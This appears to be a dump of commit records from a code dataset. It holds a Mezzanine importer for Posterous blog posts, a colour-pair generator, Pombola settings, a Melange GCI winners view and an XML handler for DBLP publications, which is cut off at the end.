|
Add initial support for importing blog posts from posterous.
|
Add initial support for importing blog posts from posterous.
|
Python
|
bsd-2-clause
|
sjdines/mezzanine,dsanders11/mezzanine,readevalprint/mezzanine,damnfine/mezzanine,Skytorn86/mezzanine,sjdines/mezzanine,cccs-web/mezzanine,industrydive/mezzanine,biomassives/mezzanine,dovydas/mezzanine,damnfine/mezzanine,viaregio/mezzanine,wyzex/mezzanine,sjuxax/mezzanine,orlenko/sfpirg,guibernardino/mezzanine,Cajoline/mezzanine,gbosh/mezzanine,fusionbox/mezzanine,dekomote/mezzanine-modeltranslation-backport,wyzex/mezzanine,tuxinhang1989/mezzanine,webounty/mezzanine,frankier/mezzanine,ZeroXn/mezzanine,douglaskastle/mezzanine,ryneeverett/mezzanine,joshcartme/mezzanine,vladir/mezzanine,biomassives/mezzanine,sjdines/mezzanine,stephenmcd/mezzanine,nikolas/mezzanine,Cicero-Zhao/mezzanine,dustinrb/mezzanine,jjz/mezzanine,promil23/mezzanine,readevalprint/mezzanine,dekomote/mezzanine-modeltranslation-backport,ZeroXn/mezzanine,agepoly/mezzanine,agepoly/mezzanine,mush42/mezzanine,emile2016/mezzanine,adrian-the-git/mezzanine,eino-makitalo/mezzanine,SoLoHiC/mezzanine,theclanks/mezzanine,vladir/mezzanine,orlenko/sfpirg,viaregio/mezzanine,molokov/mezzanine,ryneeverett/mezzanine,dustinrb/mezzanine,scarcry/snm-mezzanine,SoLoHiC/mezzanine,orlenko/plei,frankchin/mezzanine,industrydive/mezzanine,scarcry/snm-mezzanine,stephenmcd/mezzanine,Cajoline/mezzanine,emile2016/mezzanine,PegasusWang/mezzanine,sjuxax/mezzanine,wrwrwr/mezzanine,jerivas/mezzanine,jerivas/mezzanine,jjz/mezzanine,wbtuomela/mezzanine,PegasusWang/mezzanine,SoLoHiC/mezzanine,orlenko/plei,dustinrb/mezzanine,geodesign/mezzanine,molokov/mezzanine,vladir/mezzanine,dovydas/mezzanine,christianwgd/mezzanine,frankier/mezzanine,frankchin/mezzanine,tuxinhang1989/mezzanine,gradel/mezzanine,industrydive/mezzanine,stbarnabas/mezzanine,Kniyl/mezzanine,douglaskastle/mezzanine,stbarnabas/mezzanine,damnfine/mezzanine,agepoly/mezzanine,saintbird/mezzanine,stephenmcd/mezzanine,batpad/mezzanine,christianwgd/mezzanine,jjz/mezzanine,AlexHill/mezzanine,nikolas/mezzanine,geodesign/mezzanine,wbtuomela/mezzanine,emile2016/mezzanine,gradel/mezzanine,Kniyl/mezzanine,christianwgd/mezzanine,saintbird/mezzanine,frankier/mezzanine,theclanks/mezzanine,Skytorn86/mezzanine,dovydas/mezzanine,wbtuomela/mezzanine,fusionbox/mezzanine,douglaskastle/mezzanine,promil23/mezzanine,Skytorn86/mezzanine,Cicero-Zhao/mezzanine,dekomote/mezzanine-modeltranslation-backport,dsanders11/mezzanine,webounty/mezzanine,eino-makitalo/mezzanine,spookylukey/mezzanine,jerivas/mezzanine,gradel/mezzanine,ZeroXn/mezzanine,adrian-the-git/mezzanine,PegasusWang/mezzanine,cccs-web/mezzanine,readevalprint/mezzanine,orlenko/sfpirg,viaregio/mezzanine,gbosh/mezzanine,scarcry/snm-mezzanine,eino-makitalo/mezzanine,guibernardino/mezzanine,spookylukey/mezzanine,webounty/mezzanine,promil23/mezzanine,wyzex/mezzanine,Kniyl/mezzanine,mush42/mezzanine,Cajoline/mezzanine,wrwrwr/mezzanine,sjuxax/mezzanine,orlenko/plei,biomassives/mezzanine,spookylukey/mezzanine,geodesign/mezzanine,saintbird/mezzanine,mush42/mezzanine,batpad/mezzanine,adrian-the-git/mezzanine,molokov/mezzanine,theclanks/mezzanine,dsanders11/mezzanine,tuxinhang1989/mezzanine,ryneeverett/mezzanine,nikolas/mezzanine,AlexHill/mezzanine,joshcartme/mezzanine,gbosh/mezzanine,frankchin/mezzanine,joshcartme/mezzanine
|
Add initial support for importing blog posts from posterous.
|
from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path = 'sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
<commit_before><commit_msg>Add initial support for importing blog posts from posterous.<commit_after>
|
from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path = 'sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
Add initial support for importing blog posts from posterous.from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path = 'sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
<commit_before><commit_msg>Add initial support for importing blog posts from posterous.<commit_after>from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path = 'sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
|
ac80535f35f42f22e85606c00deae7c0329367d9
|
RainbowGenerator.py
|
RainbowGenerator.py
|
# Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
Make the world a happier place with a Rainbow!
|
Make the world a happier place with a Rainbow!
|
Python
|
bsd-2-clause
|
Sonophoto/PythonNotes,Sonophoto/PythonNotes
|
Make the world a happier place with a Rainbow!
|
# Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
<commit_before><commit_msg>Make the world a happier place with a Rainbow!<commit_after>
|
# Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
Make the world a happier place with a Rainbow!# Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
<commit_before><commit_msg>Make the world a happier place with a Rainbow!<commit_after># Generate 2 colour combos from R-O-Y-G-B-Purple
# Implementation (c) 2017 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite.
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
list_of_colours = []
number_of_colours = 0
# Generate a set of colour tuples and output
for tone in warm_colours:
for tint in cool_colours:
list_of_colours.append( (tone, tint) )
list_of_colours.append( (tint, tone) )
number_of_colours += 2
# Output tuples as linefeed delimited strings
for output_index in range(number_of_colours):
output_string = " ".join(str(x) for x in list_of_colours[output_index])
print(output_string)
|
|
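The nested loops above emit each warm/cool pairing twice, once in each order. The same output can be produced more compactly with itertools.product; a minimal sketch under the same colour lists (an alternative, not the committed code):
# Sketch: equivalent pair generation via itertools.product
from itertools import product
warm_colours = ["red", "orange", "yellow"]
cool_colours = ["green", "blue", "purple"]
pairs = []
for tone, tint in product(warm_colours, cool_colours):
    pairs.append((tone, tint))  # warm colour first
    pairs.append((tint, tone))  # cool colour first
# Output tuples as linefeed-delimited strings, as in the original
for pair in pairs:
    print(" ".join(pair))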
51943abe4c5dc072d5e4e4f938f0d66aade93d57
|
pombola/settings/nigeria_base.py
|
pombola/settings/nigeria_base.py
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
Add pombola.spinner to OPTIONAL_APPS in the new settings modules
|
Add pombola.spinner to OPTIONAL_APPS in the new settings modules
|
Python
|
agpl-3.0
|
geoffkilpin/pombola,patricmutwiri/pombola,ken-muturi/pombola,mysociety/pombola,ken-muturi/pombola,patricmutwiri/pombola,hzj123/56th,mysociety/pombola,mysociety/pombola,patricmutwiri/pombola,mysociety/pombola,hzj123/56th,ken-muturi/pombola,ken-muturi/pombola,hzj123/56th,geoffkilpin/pombola,mysociety/pombola,geoffkilpin/pombola,geoffkilpin/pombola,ken-muturi/pombola,geoffkilpin/pombola,patricmutwiri/pombola,hzj123/56th,geoffkilpin/pombola,ken-muturi/pombola,hzj123/56th,patricmutwiri/pombola,patricmutwiri/pombola,hzj123/56th,mysociety/pombola
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
Add pombola.spinner to OPTIONAL_APPS in the new settings modules
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
<commit_before>COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
<commit_msg>Add pombola.spinner to OPTIONAL_APPS in the new settings modules<commit_after>
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
Add pombola.spinner to OPTIONAL_APPS in the new settings modulesCOUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
<commit_before>COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = []
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
<commit_msg>Add pombola.spinner to OPTIONAL_APPS in the new settings modules<commit_after>COUNTRY_APP = 'nigeria'
OPTIONAL_APPS = ['pombola.spinner']
TWITTER_USERNAME = 'NGShineyoureye'
TWITTER_WIDGET_ID = '354909651910918144'
BLOG_RSS_FEED = 'http://eienigeria.org/rss.xml'
MAP_BOUNDING_BOX_NORTH = 14.1
MAP_BOUNDING_BOX_EAST = 14.7
MAP_BOUNDING_BOX_SOUTH = 4
MAP_BOUNDING_BOX_WEST = 2.5
MAPIT_COUNTRY = 'NG'
|
00f3ce70966a202ced03720c9ada0443820e52d3
|
app/soc/modules/gci/views/winners.py
|
app/soc/modules/gci/views/winners.py
|
#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
Implement the view for GCI Winners page.
|
Implement the view for GCI Winners page.
|
Python
|
apache-2.0
|
rhyolight/nupic.son,rhyolight/nupic.son,rhyolight/nupic.son
|
Implement the view for GCI Winners page.
|
#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
<commit_before><commit_msg>Implement the view for GCI Winners page.<commit_after>
|
#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
Implement the view for GCI Winners page.#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
<commit_before><commit_msg>Implement the view for GCI Winners page.<commit_after>#!/usr/bin/env python2.5
#
# Copyright 2012 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the view for GCI winners page.
"""
from soc.views.helper import url_patterns
from soc.modules.gci.logic.ranking import winnersForProgram
from soc.modules.gci.views import common_templates
from soc.modules.gci.views.base import RequestHandler
from soc.modules.gci.views.helper import url_names
from soc.modules.gci.views.helper.url_patterns import url
class WinnersPage(RequestHandler):
"""View for the winners page.
"""
def templatePath(self):
return 'v2/modules/gci/winners/base.html'
def djangoURLPatterns(self):
return [
url(r'winners/%s$' % url_patterns.PROGRAM, self,
name=url_names.GCI_WINNERS),
]
def checkAccess(self):
self.check.areWinnersVisible()
def context(self):
winners = winnersForProgram(self.data)
#e.parent().name()
#e.tasks()
return {
'page_name': "Winners of %s" % self.data.program.name,
'winners': winners,
'your_score': common_templates.YourScore(self.data),
'program_select': common_templates.ProgramSelect(
self.data, url_names.GCI_WINNERS),
}
|
|
678a3e2fbe54fc1f7e15074383db290cb198b837
|
code/loader/dblploader/dblpcontent.py
|
code/loader/dblploader/dblpcontent.py
|
class DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super().__init__()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
if [x for x in self.authorFilter if compareNames(removeAccents(x['name']),
removeAccents(author))]:
self.queue.put(DBLPContentHandler.attrs)
# Flush object
except KeyError as error:
logging.debug(error)
DBLPContentHandler.inPublication = False
DBLPContentHandler.attrs = {}
else:
if name == "author":
if DBLPContentHandler.attrs.get(name) is not None:
DBLPContentHandler.attrs[name].append(DBLPContentHandler.value.strip())
else:
DBLPContentHandler.attrs[name] = [DBLPContentHandler.value]
else:
DBLPContentHandler.attrs[name] = DBLPContentHandler.value
DBLPContentHandler.value = ''
def characters(self, content):
if content != '':
DBLPContentHandler.value += content.replace('\n', '')
|
Split loader and xml handler
|
Split loader and xml handler
|
Python
|
mit
|
arcosta/sci-synergy,arcosta/sci-synergy,arcosta/sci-synergy
|
Split loader and xml handler
|
class DBLPContentHandler(ContentHandler):
"""Handle xml database content"""
inPublication = True
currentPubName = ''
attrs = {}
value = ''
def __init__(self, queue=''):
super().__init__()
self.authorFilter = loadAuthorFilter()
#self.authorFilter = loadAuthor()
self.queue = queue
def startElement(self, name, attrs):
try:
if pubtypes.index(name) >= 0:
DBLPContentHandler.inPublication = True
DBLPContentHandler.currentPubName = name
DBLPContentHandler.attrs['key'] = attrs['key']
except ValueError as error:
logging.debug(error)
def endElement(self, name):
if DBLPContentHandler.inPublication is True:
if DBLPContentHandler.currentPubName == name:
DBLPContentHandler.attrs["type"] = name
#filtering publications by author
try:
for author in DBLPContentHandler.attrs['author']:
author = author.strip()
